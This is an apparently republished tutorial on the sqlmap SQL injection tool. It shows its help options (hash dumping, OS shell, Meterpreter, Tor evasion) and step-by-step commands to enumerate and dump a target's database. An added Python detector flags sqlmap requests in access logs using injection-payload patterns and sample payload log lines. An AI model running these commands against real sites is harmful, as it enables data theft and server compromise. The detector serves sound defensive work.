SQL Injection Tool: Sqlmap command

Source: Internet
Author: User
Tags: http, cookie, sql injection

sqlmap is a professional SQL injection tool. It automates injection testing efficiently, so you can say goodbye to manual injection.

The prerequisite is that you have already found an injection point. The tool's official website is http://sqlmap.org/

Kali ships with sqlmap installed by default, so no additional installation is required.

sqlmap command-line help:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1. One#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

Usage: python sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behaviour
    --flush-session     Flush session files for current target

  Miscellaneous:
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --wizard            Simple wizard interface for beginner users

Enumerate the list of databases:

sqlmap -u "http://<URL address>/index.php?id=1" --dbs

Enumerate the tables of a given database:

sqlmap -u "http://<URL address>/index.php?id=1" -D <database> --tables

Enumerate the column structure of a given table in that database:

sqlmap -u "http://<URL address>/index.php?id=1" -D <database> -T <database table> --columns

Dump the table data for the chosen columns, based on that table structure:

sqlmap -u "http://<URL address>/index.php?id=1" -D <database> -T <database table> -C <column name 1>,<column name 2> --dump
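
The default "BEUSTQ" technique set and the --random-agent option in the help above also matter on the defending side: unless --random-agent is given, sqlmap names itself in the User-Agent header, and each technique leaves recognizable tokens in the tested parameter. The Python code below is an added example, not part of the original post or of sqlmap; the log lines, IP addresses, the X.Y version placeholder and the signature patterns are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Access-log lines constructed for this example (documentation IPs, placeholder version).
SAMPLE_LOG = """\
198.51.100.9 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/X.Y#stable (http://sqlmap.org)"
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%20AND%204321%3D4321 HTTP/1.1" 200 512 "-" "sqlmap/X.Y#stable (http://sqlmap.org)"
192.0.2.44 - - [01/Jan/2024:10:05:00 +0000] "GET /index.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 498 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2024:10:05:01 +0000] "GET /index.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
DEFAULT_UA = re.compile(r"^sqlmap/", re.I)  # sent unless --random-agent is used
# One coarse, assumed signature per technique letter of "BEUSTQ" (Q omitted).
SIGNATURES = {
    "B": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "E": re.compile(r"\b(?:EXTRACTVALUE|UPDATEXML)\s*\(", re.I),
    "U": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "S": re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I),
    "T": re.compile(r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I),
}

def analyze(log_text):
    """Map client IP -> {'default_ua', 'techniques', 'params'} for suspicious requests."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        ip, target, ua = m.groups()
        default_ua = bool(DEFAULT_UA.match(ua))
        techniques, params = set(), set()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            matched = {t for t, rx in SIGNATURES.items() if rx.search(value)}
            if matched:
                techniques |= matched
                params.add(name)  # remember which parameter carried the payload
        if default_ua or techniques:
            entry = findings.setdefault(ip, {"default_ua": False, "techniques": set(), "params": set()})
            entry["default_ua"] |= default_ua
            entry["techniques"] |= techniques
            entry["params"] |= params
    return findings

if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, entry["default_ua"], sorted(entry["techniques"]), sorted(entry["params"]))
```

The second client shows why the User-Agent check alone is not enough: it presents a browser User-Agent but is still flagged by the payload tokens in the id parameter.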

Source: http://www.cnblogs.com/diligenceday/
Enterprise Website: http://www.idrwl.com/
Open Source Blog: Http://www.github.com/sqqihao
QQ: 287101329